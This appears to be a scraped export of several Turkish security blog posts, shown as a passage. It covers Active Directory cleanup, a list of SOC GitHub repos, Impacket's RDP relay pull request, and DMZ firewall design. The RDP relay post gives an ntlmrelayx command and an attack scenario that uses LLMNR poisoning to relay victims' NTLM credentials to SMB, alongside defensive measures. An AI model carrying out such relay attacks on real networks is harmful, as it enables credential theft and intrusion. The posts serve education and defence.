\"AD-Cleanup-DomainJoin\" ad\u0131nda yeni bir g&ouml;rev olu\u015fturun.<br>2. Tetikleyici (Trigger): Her g&uuml;n veya her saat ba\u015f\u0131 &ccedil;al\u0131\u015facak \u015fekilde ayarlay\u0131n.<br>3. Eylem (Action): powershell.exe program\u0131n\u0131 ba\u015flat\u0131n.<br>4. Ba\u011f\u0131ms\u0131z De\u011fi\u015fkenler: -ExecutionPolicy Bypass -File \"C:\\Scripts\\ADCleanup.ps1\" yolunu ekleyin.<br>5. Kullan\u0131c\u0131: G&ouml;revin \"Domain Admin\" yetkisine sahip bir hesapla (veya SYSTEM hesab\u0131, e\u011fer DC &uuml;zerinde &ccedil;al\u0131\u015facaksa) &ccedil;al\u0131\u015ft\u0131r\u0131ld\u0131\u011f\u0131ndan emin olun.<\/p>\n<p>&nbsp;Neden Bu Temizlik Gerekli?<\/p>\n<p>&nbsp;<br>Ayr\u0131cal\u0131k Y&uuml;kseltme (Privilege Escalation): Nesne sahibi olan hesap, msDS-AllowedToActOnBehalfOfOtherIdentity (RBCD) gibi kritik &ouml;znitelikleri de\u011fi\u015ftirebilir.<\/p>\n<p><br>&nbsp;<br>Gizli Verilere Eri\u015fim: Sahiplik haklar\u0131, LAPS parolalar\u0131 (ms-Mcs-AdmPwd) gibi hassas bilgilerin okunmas\u0131na yol a&ccedil;abilir.<\/p>\n<p><br>&nbsp;<br>Miras \u0130zinlerin Kesilmesi: Bilgisayar\u0131 farkl\u0131 bir OU'ya ta\u015f\u0131mak, djoinacc hesab\u0131n\u0131n o nesne &uuml;zerindeki devral\u0131nm\u0131\u015f t&uuml;m haklar\u0131n\u0131 etkisiz hale getirir.<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>","excerpt":"AD g\u00fcvenli\u011fi, bir kez yap\u0131l\u0131p unutulacak bir i\u015f de\u011fil, s\u00fcrekli bir denetim s\u00fcrecidir. Bu ad\u0131mlar\u0131 uygulayarak altyap\u0131n\u0131z\u0131 \u00e7ok daha diren\u00e7li hale getirebilirsiniz.","created_at":"2026-02-04 22:54:49","updated_at":"2026-09-23 16:37:29","category_id":7,"view_count":697,"reading_time":8,"status":"published","editor_choice":0,"is_editor_choice":0,"published_at":"2026-02-04 19:54:49","featured_image":"\/uploads\/images\/2026\/02\/6983a3f4b2338_1770234868.jpg","slug":"active-directory-ortamlarinda-guvenlik","category_name":"Cyber Security","category_slug":"cyber-security","category_color":"#10b981"},{"id":391,"title":"SOC (Security Operations Center) ile ilgili GitHub repolar\u0131","content":"<p>&nbsp;<\/p>\n<h2>\ud83d\udd1d &Ouml;nerilen SOC GitHub Repolar\u0131:<\/h2>\n<h3>1. <strong>Microsoft Student SOC Toolkit<\/strong><\/h3>\n<ul>\n<li><strong>Repo:<\/strong> <code>github.com\/microsoft\/SOC<\/code><\/li>\n<li>&Ouml;\u011frenciler i&ccedil;in kapsaml\u0131 SOC e\u011fitim materyalleri<\/li>\n<li>Microsoft Sentinel, Defender ve Security Copilot ara&ccedil;lar\u0131<\/li>\n<li>Sim&uuml;le edilmi\u015f g&uuml;venlik olaylar\u0131 ve uygulamal\u0131 deneyim<\/li>\n<\/ul>\n<h3>2. <strong>OSSOCDOCS - Open Source SOC Documentation<\/strong><\/h3>\n<ul>\n<li><strong>Repo:<\/strong> <code>github.com\/madirish\/ossocdocs<\/code><\/li>\n<li>10 y\u0131ll\u0131k SOC deneyiminden olu\u015fturulmu\u015f kapsaml\u0131 dok&uuml;mantasyon<\/li>\n<li>SOP'ler (Standard Operating Procedures), politikalar ve s&uuml;re&ccedil;ler<\/li>\n<li>Teknoloji-agnostik framework<\/li>\n<\/ul>\n<h3>3. <strong>SOC Toolkit (A&ccedil;\u0131k Kaynak Ara&ccedil;larla)<\/strong><\/h3>\n<ul>\n<li><strong>Repo:<\/strong> <code>github.com\/phrp720\/soc-toolkit<\/code><\/li>\n<li>Tamamen a&ccedil;\u0131k kaynak ara&ccedil;larla olu\u015fturulmu\u015f SOC<\/li>\n<li>Docker ile tek t\u0131kla kurulum<\/li>\n<li>Ta\u015f\u0131nabilir ve kolay kullan\u0131m<\/li>\n<\/ul>\n<h3>4. <strong>SOC Analyst Resources<\/strong><\/h3>\n<ul>\n<li><strong>Topic:<\/strong> <code>github.com\/topics\/security-operations-center<\/code><\/li>\n<li>Log analizi, incident response, threat hunting kaynaklar\u0131<\/li>\n<li>DFIR, malware analizi, email g&uuml;venli\u011fi<\/li>\n<li>Cheat sheet'ler ve blue team ara&ccedil;lar\u0131<\/li>\n<\/ul>\n<h3>5. <strong>OpenSOC<\/strong><\/h3>\n<ul>\n<li><strong>Repo:<\/strong> <code>github.com\/OpenSOC<\/code><\/li>\n<li>Apache Hadoop tabanl\u0131 b&uuml;y&uuml;k veri g&uuml;venlik analitik framework<\/li>\n<li>Saniyede milyonlarca mesaj i\u015fleyebilir<\/li>\n<li>Network trafi\u011fi ve telemetri verisi izleme<\/li>\n<\/ul>\n<h3>6. <strong>SOC Copilot<\/strong><\/h3>\n<ul>\n<li><strong>Repo:<\/strong> <code>github.com\/lewiswigmore\/soc-copilot<\/code><\/li>\n<li>OpenAI GPT destekli SOC asistan\u0131<\/li>\n<li>Vulnerability analizi, MITRE ATT&amp;CK mapping<\/li>\n<li>IoC toplama, phishing analizi<\/li>\n<\/ul>\n<p>repo'yu daha detayl\u0131 inceleyece\u011fiz.. takip edin<\/p>","excerpt":"SOC (Security Operations Center) ile ilgili GitHub repolar\u0131n\u0131 arayal\u0131m.Harika! SOC ile ilgili bir\u00e7ok faydal\u0131 GitHub reposu","created_at":"2026-02-04 22:15:38","updated_at":"2026-09-23 14:33:33","category_id":7,"view_count":635,"reading_time":2,"status":"published","editor_choice":0,"is_editor_choice":0,"published_at":"2026-02-04 19:15:38","featured_image":"\/uploads\/images\/2026\/02\/69839ab965761_1770232505.png","slug":"soc-security-operations-center-ile-ilgili-github-repolari","category_name":"Cyber Security","category_slug":"cyber-security","category_color":"#10b981"},{"id":378,"title":"RDP Relay Server (PR #2101)","content":"<div id=\"model-response-message-contentr_df0491ff39e17bba\" class=\"markdown markdown-main-panel stronger enable-updated-hr-color\" dir=\"ltr\" aria-live=\"polite\" aria-busy=\"false\">\n<p data-path-to-node=\"0\">Fortra'n\u0131n pop&uuml;ler a\u011f protokol&uuml; k&uuml;t&uuml;phanesi&nbsp;<strong data-path-to-node=\"0\" data-index-in-node=\"44\">Impacket<\/strong> &uuml;zerindeki <strong data-path-to-node=\"0\" data-index-in-node=\"64\">#2101<\/strong> numaral\u0131 Pull Request (PR), siber g&uuml;venlik d&uuml;nyas\u0131 i&ccedil;in olduk&ccedil;a heyecan verici bir yenili\u011fi g&uuml;ndeme ta\u015f\u0131yor: <strong data-path-to-node=\"0\" data-index-in-node=\"179\">RDP Relay Server (RDP Aktar\u0131m Sunucusu) deste\u011fi.<\/strong><\/p>\n<p data-path-to-node=\"1\">Bu geli\u015fme, &ouml;zellikle s\u0131zma testi uzmanlar\u0131 ve k\u0131rm\u0131z\u0131 tak\u0131m (Red Team) operat&ouml;rleri i&ccedil;in NTLM relay sald\u0131r\u0131lar\u0131nda yeni bir ufuk a&ccedil;\u0131yor. \u0130\u015fte bu PR'\u0131n detaylar\u0131, teknik arka plan\u0131 ve g&uuml;venlik d&uuml;nyas\u0131 i&ccedil;in ne anlama geldi\u011fine dair kapsaml\u0131 bir inceleme.<\/p>\n<p data-path-to-node=\"1\"><a href=\"https:\/\/github.com\/fortra\/impacket\/pull\/2101\">https:\/\/github.com\/fortra\/impacket\/pull\/2101<\/a><\/p>\n<hr data-path-to-node=\"2\">\n<h1 data-path-to-node=\"3\">Impacket'e Yeni Bir G&uuml;&ccedil;: RDP Relay Server (PR #2101)<\/h1>\n<p data-path-to-node=\"4\">Siber g&uuml;venlik ara&ccedil;lar\u0131 aras\u0131nda bir \"\u0130svi&ccedil;re &ccedil;ak\u0131s\u0131\" olarak kabul edilen Impacket, a\u011f protokollerini manip&uuml;le etme konusunda rakipsizdir. Son d&ouml;nemde <strong data-path-to-node=\"4\" data-index-in-node=\"151\">azoxlpf<\/strong> taraf\u0131ndan a&ccedil;\u0131lan #2101 numaral\u0131 PR ile projeye eklenen <strong data-path-to-node=\"4\" data-index-in-node=\"215\">RDP Relay<\/strong> &ouml;zelli\u011fi, uzun s&uuml;redir eksikli\u011fi hissedilen bir bo\u015flu\u011fu doldurmaya aday.<\/p>\n<h2 data-path-to-node=\"5\">1. Nedir Bu RDP Relay?<\/h2>\n<p data-path-to-node=\"6\">Bug&uuml;ne kadar Impacket i&ccedil;indeki <code data-path-to-node=\"6\" data-index-in-node=\"31\">ntlmrelayx.py<\/code> arac\u0131; SMB, HTTP, MSSQL ve LDAP gibi protokoller &uuml;zerinden gelen kimlik do\u011frulama isteklerini ba\u015fka hedeflere aktarabiliyordu. Ancak RDP (Uzak Masa&uuml;st&uuml; Protokol&uuml;) &uuml;zerinden bir relay (aktar\u0131m) ger&ccedil;ekle\u015ftirmek, protokol&uuml;n karma\u015f\u0131kl\u0131\u011f\u0131 ve \u015fifreleme katmanlar\u0131 nedeniyle her zaman daha zordu.<\/p>\n<p data-path-to-node=\"7\"><strong data-path-to-node=\"7\" data-index-in-node=\"0\">PR #2101<\/strong>, Impacket'e bir RDP sunucusu dinleyicisi (listener) ekliyor. Bu sayede, kurban bir makineden sald\u0131rgan\u0131n makinesine yanl\u0131\u015fl\u0131kla veya y&ouml;nlendirme sonucu bir RDP ba\u011flant\u0131s\u0131 ba\u015flat\u0131ld\u0131\u011f\u0131nda, sald\u0131rgan bu kimlik do\u011frulama verilerini yakalay\u0131p ba\u015fka bir servise (&ouml;rne\u011fin SMB veya LDAP) aktarabiliyor.<\/p>\n<h2 data-path-to-node=\"8\">2. Teknik Detaylar ve Uygulama<\/h2>\n<p data-path-to-node=\"9\">Bu PR ile gelen temel de\u011fi\u015fiklikler \u015funlard\u0131r:<\/p>\n<ul data-path-to-node=\"10\">\n<li>\n<p data-path-to-node=\"10,0,0\"><strong data-path-to-node=\"10,0,0\" data-index-in-node=\"0\">RDP Protokol Deste\u011fi:<\/strong> Impacket'in protokol k&uuml;t&uuml;phanesine RDP paket yap\u0131s\u0131 ve el s\u0131k\u0131\u015fma (handshake) s&uuml;re&ccedil;leri daha entegre hale getirildi.<\/p>\n<\/li>\n<li>\n<p data-path-to-node=\"10,1,0\"><strong data-path-to-node=\"10,1,0\" data-index-in-node=\"0\"><code data-path-to-node=\"10,1,0\" data-index-in-node=\"0\">ntlmrelayx<\/code> Entegrasyonu:<\/strong> RDP art\u0131k bir giri\u015f (incoming) protokol&uuml; olarak kullan\u0131labiliyor. Yani sald\u0131rgan <code data-path-to-node=\"10,1,0\" data-index-in-node=\"106\">-t<\/code> (target) parametresiyle hedefi belirlerken, kurban\u0131n RDP &uuml;zerinden ba\u011flanmas\u0131n\u0131 bekleyebiliyor.<\/p>\n<\/li>\n<li>\n<p data-path-to-node=\"10,2,0\"><strong data-path-to-node=\"10,2,0\" data-index-in-node=\"0\">NLA (Network Level Authentication) Manip&uuml;lasyonu:<\/strong> RDP ba\u011flant\u0131lar\u0131nda kullan\u0131lan NLA katman\u0131, asl\u0131nda arka planda NTLM veya Kerberos kullan\u0131r. Bu PR, NLA el s\u0131k\u0131\u015fmas\u0131 s\u0131ras\u0131ndaki NTLM challenge-response ak\u0131\u015f\u0131n\u0131 yakalay\u0131p relay s&uuml;recine dahil ediyor.<\/p>\n<\/li>\n<\/ul>\n<h2 data-path-to-node=\"11\">3. Sald\u0131r\u0131 Senaryosu: Nas\u0131l Kullan\u0131l\u0131r?<\/h2>\n<p data-path-to-node=\"12\">Tipik bir senaryoda sald\u0131rgan \u015fu ad\u0131mlar\u0131 izler:<\/p>\n<ol start=\"1\" data-path-to-node=\"13\">\n<li>\n<p data-path-to-node=\"13,0,0\"><strong data-path-to-node=\"13,0,0\" data-index-in-node=\"0\">Dinleyiciyi Ba\u015flatma:<\/strong> <code data-path-to-node=\"13,0,0\" data-index-in-node=\"22\">ntlmrelayx.py -t smb:\/\/hedef-sunucu --rdp<\/code> komutuyla (veya ilgili yeni parametrelerle) bir RDP dinleyicisi a&ccedil;\u0131l\u0131r.<\/p>\n<\/li>\n<li>\n<p data-path-to-node=\"13,1,0\"><strong data-path-to-node=\"13,1,0\" data-index-in-node=\"0\">Kurban\u0131 Y&ouml;nlendirme:<\/strong> Kurban kullan\u0131c\u0131, bir \u015fekilde (LLMNR\/NBT-NS zehirlemesi veya sosyal m&uuml;hendislik ile) sald\u0131rgan\u0131n IP'sine RDP yapmaya zorlan\u0131r.<\/p>\n<\/li>\n<li>\n<p data-path-to-node=\"13,2,0\"><strong data-path-to-node=\"13,2,0\" data-index-in-node=\"0\">Kimlik Aktar\u0131m\u0131:<\/strong> Kurban kullan\u0131c\u0131 kullan\u0131c\u0131 ad\u0131 ve parolas\u0131n\u0131 (veya hash bilgisini) girdi\u011finde, Impacket bu NTLM verisini al\u0131r ve an\u0131nda <code data-path-to-node=\"13,2,0\" data-index-in-node=\"137\">hedef-sunucu<\/code> &uuml;zerindeki SMB servisine basar.<\/p>\n<\/li>\n<li>\n<p data-path-to-node=\"13,3,0\"><strong data-path-to-node=\"13,3,0\" data-index-in-node=\"0\">Sonu&ccedil;:<\/strong> E\u011fer kurban\u0131n yetkileri yeterliyse, sald\u0131rgan hedef sunucuda komut &ccedil;al\u0131\u015ft\u0131rabilir veya veri s\u0131zd\u0131rabilir.<\/p>\n<\/li>\n<\/ol>\n<p dir=\"auto\">NTLMRelayx RDP sunucusunda bir y&ouml;neticinin do\u011frulamas\u0131:<\/p>\n<p><img src=\"https:\/\/private-user-images.githubusercontent.com\/213314124\/531571457-6d871452-73f0-4333-8f8c-e87c84ff8e05.png?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3Njc2MzcxMDAsIm5iZiI6MTc2NzYzNjgwMCwicGF0aCI6Ii8yMTMzMTQxMjQvNTMxNTcxNDU3LTZkODcxNDUyLTczZjAtNDMzMy04ZjhjLWU4N2M4NGZmOGUwNS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjYwMTA1JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI2MDEwNVQxODEzMjBaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT00NjJjMjA1NTk0OWMyYmNjM2VlMzkyNjAzYzA3ZDAyMDcwZDMwNDJiNjBkYjY3YzZiYTgwZjYwNTVmY2E3ZDMxJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.OyoF_6dFo67h9icAusqs3W83i9_bxuDoTgklbTSZUsM\" alt=\"1\"><\/p>\n<p dir=\"auto\">SMB imzas\u0131n\u0131n gerekmedi\u011fi bir sunucuda NTLM kimlik do\u011frulamas\u0131n\u0131n SMB'ye ileti:<\/p>\n<p><img src=\"https:\/\/private-user-images.githubusercontent.com\/213314124\/531571591-3dfd29a8-ca98-4a8d-b128-819acebba028.png?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3Njc2MzcxMDAsIm5iZiI6MTc2NzYzNjgwMCwicGF0aCI6Ii8yMTMzMTQxMjQvNTMxNTcxNTkxLTNkZmQyOWE4LWNhOTgtNGE4ZC1iMTI4LTgxOWFjZWJiYTAyOC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjYwMTA1JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI2MDEwNVQxODEzMjBaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0xYzg3MzQ4ZjY2ODYxNjEzNzA0MTc2OTZlMTMzMTk3NjhiZjc4MDUxOWZlMDhiOGY2N2JkMjlhMWM5NzdjZDI4JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.flp7dXg-T9ccDksfKT15BpvT-a8KNdzS6fSyGH1N9fg\" alt=\"2\"><\/p>\n<h2 data-path-to-node=\"14\"><img src=\"https:\/\/private-user-images.githubusercontent.com\/213314124\/531571866-5de5a3e8-7c76-4578-a7c3-b3e3ead51da8.png?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3Njc2MzcxMDAsIm5iZiI6MTc2NzYzNjgwMCwicGF0aCI6Ii8yMTMzMTQxMjQvNTMxNTcxODY2LTVkZTVhM2U4LTdjNzYtNDU3OC1hN2MzLWIzZTNlYWQ1MWRhOC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjYwMTA1JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI2MDEwNVQxODEzMjBaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1hYjlkYzA0YWIwOTE1MGJmOWQ1NzBmMmI4MzUyYTYzMjY5MDZmNmI3ODBmN2Q4ZjdlZTM3MWZiNDM0ODgwNTVlJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.-LelE0tHtK61Osp2P0ePikxTjLf5X9kBm9tYYSgzMQI\" alt=\"\">4. Neden &Ouml;nemli?<\/h2>\n<ul data-path-to-node=\"15\">\n<li>\n<p data-path-to-node=\"15,0,0\"><strong data-path-to-node=\"15,0,0\" data-index-in-node=\"0\">Yeni Bir Vekt&ouml;r:<\/strong> Bir&ccedil;ok kurumda SMB imzalama (SMB Signing) zorunlu hale getirilerek relay sald\u0131r\u0131lar\u0131 engellenmi\u015ftir. Ancak RDP &uuml;zerinden gelen ba\u011flant\u0131lar\u0131n relay edilmesi, defans ekiplerinin genellikle g&ouml;zden ka&ccedil;\u0131rd\u0131\u011f\u0131 bir bo\u015fluktur.<\/p>\n<\/li>\n<li>\n<p data-path-to-node=\"15,1,0\"><strong data-path-to-node=\"15,1,0\" data-index-in-node=\"0\">G&ouml;r&uuml;nmezlik:<\/strong> RDP trafi\u011fi genellikle i\u015f s&uuml;re&ccedil;lerinin bir par&ccedil;as\u0131d\u0131r ve firewall kurallar\u0131nda izinlidir. Bu, sald\u0131rgan\u0131n a\u011f i&ccedil;inde daha rahat hareket etmesini sa\u011flar.<\/p>\n<\/li>\n<\/ul>\n<h2 data-path-to-node=\"16\">5. Savunma Taraf\u0131nda Ne Yap\u0131lmal\u0131?<\/h2>\n<p data-path-to-node=\"17\">Bu t&uuml;r sald\u0131r\u0131lardan korunmak i&ccedil;in \u015fu &ouml;nlemler kritik &ouml;neme sahiptir:<\/p>\n<ul data-path-to-node=\"18\">\n<li>\n<p data-path-to-node=\"18,0,0\"><strong data-path-to-node=\"18,0,0\" data-index-in-node=\"0\">Restricted Admin Mode:<\/strong> RDP ba\u011flant\u0131lar\u0131nda kimlik bilgilerinin sunucuya g&ouml;nderilmesini engelleyen \"Restricted Admin\" modu kullan\u0131lmal\u0131d\u0131r.<\/p>\n<\/li>\n<li>\n<p data-path-to-node=\"18,1,0\"><strong data-path-to-node=\"18,1,0\" data-index-in-node=\"0\">SMB Signing ve LDAP Signing:<\/strong> Relay sald\u0131r\u0131lar\u0131n\u0131n nihai hedefleri (SMB\/LDAP) mutlaka imzalama zorunlulu\u011fu ile korunmal\u0131d\u0131r.<\/p>\n<\/li>\n<li>\n<p data-path-to-node=\"18,2,0\"><strong data-path-to-node=\"18,2,0\" data-index-in-node=\"0\">NLA Gereksinimi:<\/strong> RDP sunucular\u0131nda A\u011f D&uuml;zeyinde Kimlik Do\u011frulama (NLA) zorunlu tutulmal\u0131, ancak tek ba\u015f\u0131na yeterli olmad\u0131\u011f\u0131 (bu PR'da g&ouml;r&uuml;ld&uuml;\u011f&uuml; &uuml;zere) unutulmamal\u0131d\u0131r.<\/p>\n<\/li>\n<li>\n<p data-path-to-node=\"18,3,0\"><strong data-path-to-node=\"18,3,0\" data-index-in-node=\"0\">MFA (&Ccedil;ok Fakt&ouml;rl&uuml; Kimlik Do\u011frulama):<\/strong> RDP giri\u015flerinde MFA kullan\u0131m\u0131, relay edilen statik \u015fifrelerin veya hash'lerin i\u015flevsiz kalmas\u0131n\u0131 sa\u011flar.<\/p>\n<\/li>\n<\/ul>\n<h2 data-path-to-node=\"19\">Sonu&ccedil;<\/h2>\n<p data-path-to-node=\"20\">Impacket'in #2101 numaral\u0131 pull request'i, projenin modern sald\u0131r\u0131 tekniklerine ne kadar h\u0131zl\u0131 uyum sa\u011flad\u0131\u011f\u0131n\u0131n bir kan\u0131t\u0131. RDP Relay deste\u011fi, s\u0131zma testlerinde \"ula\u015f\u0131lamaz\" g&ouml;r&uuml;len hedeflere ula\u015fmak i&ccedil;in yeni bir anahtar sunuyor. Hen&uuml;z ana dallara (master\/main) tam olarak entegre edilme s&uuml;recinde olsa da, g&uuml;venlik ara\u015ft\u0131rmac\u0131lar\u0131n\u0131n bu geli\u015fmeyi yak\u0131ndan takip etmesi ve kendi lab ortamlar\u0131nda test etmesi \u015fiddetle tavsiye edilir.<\/p>\n<hr data-path-to-node=\"21\">\n<p data-path-to-node=\"22\"><em data-path-to-node=\"22\" data-index-in-node=\"0\">Not: Bu yaz\u0131 bilgilendirme ama&ccedil;l\u0131d\u0131r. Ara&ccedil;lar\u0131n yetkisiz sistemler &uuml;zerinde kullan\u0131m\u0131 yasal sonu&ccedil;lar do\u011furabilir.<\/em><\/p>\n<\/div>\n<p><!----><\/p>","excerpt":"Fortra'n\u0131n pop\u00fcler a\u011f protokol\u00fc k\u00fct\u00fcphanesi Impacket \u00fczerindeki #2101 numaral\u0131 Pull Request (PR), siber g\u00fcvenlik d\u00fcnyas\u0131 i\u00e7in olduk\u00e7a heyecan verici bir yenili\u011fi g\u00fcndeme ta\u015f\u0131yor: RDP Relay Server (RDP Aktar\u0131m Sunucusu) deste\u011fi.","created_at":"2026-01-05 21:20:40","updated_at":"2026-09-07 14:34:59","category_id":7,"view_count":494,"reading_time":5,"status":"published","editor_choice":0,"is_editor_choice":0,"published_at":"2026-01-05 18:20:40","featured_image":"\/uploads\/images\/2026\/01\/695c00d3c0f22_1767637203.png","slug":"rdp-relay-server-pr-2101","category_name":"Cyber Security","category_slug":"cyber-security","category_color":"#10b981"},{"id":370,"title":"DMZ\u2019de IIS + LAN\u2019da SQL Server","content":"<p>&nbsp;<\/p>\n<h1>DMZ&rsquo;de IIS + LAN&rsquo;da SQL Server<\/h1>\n<h2>Do\u011fru Mimari, G&uuml;venli Firewall Kurallar\u0131 ve Ger&ccedil;ek Sald\u0131r\u0131 Senaryolar\u0131<\/h2>\n<p>&nbsp;<\/p>\n<p><img src=\"https:\/\/edrawcloudpublicus.s3.amazonaws.com\/work\/1084471\/2022-1-24\/1643022430\/main.png?utm_source=chatgpt.com\" alt=\"Image\"><\/p>\n<p>&nbsp;<\/p>\n<p>Kurumsal a\u011f tasar\u0131mlar\u0131nda <strong>en s\u0131k yap\u0131lan ve en tehlikeli hatalardan biri<\/strong>, web sunucusu ile veritaban\u0131n\u0131 yanl\u0131\u015f g&uuml;venlik b&ouml;lgelerinde konumland\u0131rmakt\u0131r.<br>&Ouml;zellikle \u015fu soru &ccedil;ok s\u0131k sorulur:<\/p>\n<blockquote>\n<p><em>&ldquo;DMZ&rsquo;de IIS web sunucusu var, veritaban\u0131 LAN taraf\u0131nda olabilir mi?&rdquo;<\/em><\/p>\n<\/blockquote>\n<p>Cevap:<br><strong>Evet, olabilir. Ama sadece belirli ve kat\u0131 \u015fartlar sa\u011flan\u0131yorsa.<\/strong><br>Aksi h&acirc;lde DMZ kavram\u0131 tamamen anlam\u0131n\u0131 yitirir.<\/p>\n<p>Bu yaz\u0131da, <strong>kurumsal g&uuml;venlik d&uuml;nyas\u0131nda kabul edilen tek do\u011fru yakla\u015f\u0131m\u0131<\/strong>, firewall kural setleri ve ger&ccedil;ek sald\u0131r\u0131 senaryolar\u0131yla birlikte ele al\u0131yoruz.<\/p>\n<hr>\n<h2>Senaryo Netle\u015ftirme<\/h2>\n<p>Bu yaz\u0131 boyunca a\u015fa\u011f\u0131daki referans mimari kullan\u0131lm\u0131\u015ft\u0131r:<\/p>\n<p><strong>DMZ<\/strong><\/p>\n<ul>\n<li>\n<p>IIS Web Server &rarr; <code>10.10.10.2<\/code><\/p>\n<\/li>\n<\/ul>\n<p><strong>LAN (Server \/ Management VLAN)<\/strong><\/p>\n<ul>\n<li>\n<p>SQL Server &rarr; <code>192.168.40.10<\/code> (VLAN40 &ouml;nerilir)<\/p>\n<\/li>\n<\/ul>\n<blockquote>\n<p>\u2757 <strong>Veritaban\u0131 ASLA DMZ&rsquo;de konumland\u0131r\u0131lmaz<\/strong><br>\u2714\ufe0f Do\u011fru karar: Veritaban\u0131 LAN taraf\u0131nda, sunucuya &ouml;zel bir VLAN&rsquo;da olmal\u0131d\u0131r.<\/p>\n<\/blockquote>\n<hr>\n<h2>Alt\u0131n Kural (Ezberlenmeli)<\/h2>\n<blockquote>\n<p><strong>DMZ &rarr; LAN trafi\u011fi varsay\u0131lan olarak kapal\u0131d\u0131r<\/strong><br><strong>Ancak<\/strong><br><strong>DMZ &rarr; LAN sadece: Tek IP + Tek Sunucu + Tek Port \u015feklinde a&ccedil;\u0131labilir<\/strong><\/p>\n<\/blockquote>\n<p>Bu kural bozuldu\u011fu anda:<\/p>\n<ul>\n<li>\n<p>DMZ izolasyonu &ccedil;&ouml;ker<\/p>\n<\/li>\n<li>\n<p>Yatay hareket (lateral movement) m&uuml;mk&uuml;n h&acirc;le gelir<\/p>\n<\/li>\n<li>\n<p>Web sald\u0131r\u0131s\u0131, t&uuml;m i&ccedil; a\u011fa yay\u0131labilir<\/p>\n<\/li>\n<\/ul>\n<hr>\n<h2>Do\u011fru Mimari (Production Standard\u0131)<\/h2>\n<pre><code>Internet\n   |\nFirewall\n   |\nDMZ\n[IIS Web Server]\n   |\n(Firewall &uuml;zerinde kontroll&uuml; TEK kural)\n   |\nLAN (Server VLAN)\n[SQL Server]\n<\/code><\/pre>\n<p>Bu yap\u0131; bankalar, ISP&rsquo;ler ve kamu a\u011flar\u0131nda kullan\u0131lan <strong>standart DMZ yakla\u015f\u0131m\u0131d\u0131r<\/strong>.<\/p>\n<hr>\n<h2>Veritaban\u0131 Hangi VLAN&rsquo;da Olmal\u0131?<\/h2>\n<h3>Yanl\u0131\u015f Yakla\u015f\u0131m<\/h3>\n<ul>\n<li>\n<p>Kullan\u0131c\u0131 VLAN&rsquo;lar\u0131 (VLAN10 \/ VLAN20 \/ VLAN30)<\/p>\n<\/li>\n<\/ul>\n<h3>Do\u011fru Yakla\u015f\u0131m<\/h3>\n<ul>\n<li>\n<p><strong>VLAN40 &ndash; Management \/ Server VLAN<\/strong><\/p>\n<\/li>\n<\/ul>\n<p><strong>&Ouml;rnek:<\/strong><\/p>\n<pre><code>DB Server IP : 192.168.40.10\nVLAN        : 40\n<\/code><\/pre>\n<p>Bu VLAN&rsquo;da:<\/p>\n<ul>\n<li>\n<p>Kullan\u0131c\u0131 PC bulunmaz<\/p>\n<\/li>\n<li>\n<p>Sadece sunucu ve y&ouml;netim sistemleri yer al\u0131r<\/p>\n<\/li>\n<\/ul>\n<hr>\n<h2>En Kritik Nokta: Firewall Kural\u0131<\/h2>\n<p>DMZ ile LAN aras\u0131nda <strong>sadece tek bir izin kural\u0131<\/strong> bulunur.<\/p>\n<h3>IIS &rarr; SQL Firewall Kural\u0131<\/h3>\n<pre><code>Source Zone      : DMZ\nSource IP        : 10.10.10.2        (IIS Server)\nDestination Zone : VLAN40\nDestination IP  : 192.168.40.10      (SQL Server)\nService          : MSSQL (TCP 1433)  (veya MySQL 3306)\nAction           : Allow\nLog              : Enabled\nIPS              : Enabled\n<\/code><\/pre>\n<h3>Dikkat Edilmesi Gerekenler<\/h3>\n<ul>\n<li>\n<p>DMZ &rarr; LAN ANY olmaz<\/p>\n<\/li>\n<li>\n<p>DMZ &rarr; VLAN10\/20\/30 olmaz<\/p>\n<\/li>\n<li>\n<p>DMZ &rarr; Subnet bazl\u0131 izin verilmez<\/p>\n<\/li>\n<li>\n<p>\u2714\ufe0f <strong>Sadece IP &rarr; IP &rarr; Port<\/strong><\/p>\n<\/li>\n<\/ul>\n<hr>\n<h2>Veritaban\u0131 Sunucusu &Uuml;zerinde Ek G&uuml;venlik<\/h2>\n<p>Firewall kural\u0131 <strong>tek ba\u015f\u0131na yeterli de\u011fildir<\/strong>.<br>Sunucu &uuml;zerinde de ikinci bir g&uuml;venlik katman\u0131 olmal\u0131d\u0131r.<\/p>\n<h3>Windows Firewall (SQL Server)<\/h3>\n<pre><code>ALLOW TCP 1433 FROM 10.10.10.2\nDENY  ALL FROM 